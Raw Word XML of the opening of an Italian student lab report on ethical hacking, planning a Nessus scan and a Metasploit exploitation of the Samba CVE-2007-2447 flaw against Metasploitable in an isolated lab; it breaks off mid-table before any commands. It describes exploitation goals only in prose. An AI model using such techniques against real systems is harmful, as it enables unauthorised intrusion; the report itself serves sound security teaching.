            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Didattica e formativa</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota: la presente attività è stata condotta esclusivamente in ambiente di laboratorio virtualizzato e isolato, su un sistema (Metasploitable) volutamente predisposto a fini didattici per l'esercitazione di tecniche di penetration testing, nel rispetto dei principi dell'ethical hacking e senza alcun intento di attacco verso sistemi reali o di terze parti.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Introduzione</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La presente relazione documenta lo svolgimento di un'esercitazione pratica di ethical hacking articolata in due macrofasi complementari: la fase di Vulnerability Assessment, condotta mediante lo scanner Tenable Nessus, e la successiva fase di Penetration Testing attivo, condotta mediante il Metasploit Framework, finalizzata allo sfruttamento controllato di una vulnerabilità critica identificata sul sistema target.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attività si colloca nell'ambito didattico del corso di Cybersecurity ed Ethical Hacking e ha l'obiettivo di illustrare, secondo un approccio esperienziale e progressivo, l'intero ciclo di un'attività di sicurezza offensiva: dalla ricognizione della superficie d'attacco, all'identificazione sistematica delle vulnerabilità presenti, fino allo sfruttamento mirato di una di esse e alla successiva verifica dell'accesso ottenuto mediante tecniche di post-exploitation.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si precisa, in via preliminare e inequivocabile, che l'intera esercitazione è stata condotta in un ambiente di laboratorio isolato e virtualizzato, privo di connessione a reti di produzione o a sistemi di terze parti. Il sistema target, denominato Metasploitable, è una distribuzione Linux intenzionalmente vulnerabile, sviluppata e distribuita dal progetto Metasploit specificamente per finalità di formazione e addestramento in ambito di sicurezza informatica. Le macchine coinvolte sono state configurate su una rete locale dedicata (192.168.50.0/24), nel pieno rispetto dei principi di liceità, proporzionalità e finalità esclusivamente formativa che devono governare ogni attività di penetration testing didattico.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Obiettivi dell'Esercizio</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Coerentemente con la consegna fornita per l'esercitazione, le finalità perseguite sono le seguenti:</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Effettuare una ricognizione della superficie d'attacco del sistema target mediante port scanning e service fingerprinting.</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Installare, configurare ed eseguire una scansione di vulnerabilità mediante lo strumento Tenable Nessus, al fine di individuare in maniera sistematica le debolezze presenti sul sistema target.</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Analizzare i risultati della scansione e identificare, tra le vulnerabilità rilevate, quella relativa al servizio Samba, nota come "username map script" Command Execution (CVE-2007-2447), classificata di severità critica.</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Sfruttare la vulnerabilità individuata mediante il modulo dedicato del Metasploit Framework, al fine di ottenere l'esecuzione di comandi da remoto sul sistema target.</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Verificare l'accesso ottenuto mediante l'esecuzione di comandi di enumerazione di base nella shell remota (identificazione di rete, utente, sistema operativo, file system).</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Documentare in maniera puntuale ciascuna fase dell'esercitazione mediante evidenze fotografiche (screenshot) dei comandi eseguiti e dei relativi output.</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Discutere, a completamento dell'attività, le principali strategie di mitigazione applicabili per prevenire vulnerabilità della medesima classe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il conseguimento di tali obiettivi consente di dimostrare, in un contesto controllato, l'intero processo che collega l'identificazione di una vulnerabilità nota (correlata a un identificativo CVE pubblicamente documentato) al suo sfruttamento pratico, evidenziando l'importanza di un ciclo di gestione delle vulnerabilità (vulnerability management) tempestivo ed efficace nei contesti aziendali reali.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Ambiente e Strumenti di Laboratorio</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esercitazione è stata condotta all'interno di un ambiente di laboratorio virtualizzato, costituito da due macchine poste sulla medesima sottorete e configurate secondo i parametri riportati nella tabella seguente.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="8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5300"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3200"/>
            <w:gridCol w:w="5300"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Parametro</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Valore</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema attaccante</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Indirizzo IP attaccante</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.50.100/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema vittima/target</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Indirizzo IP vittima/target</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.50.150/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Scanner di vulnerabilità</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tenable Nessus Essentials</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
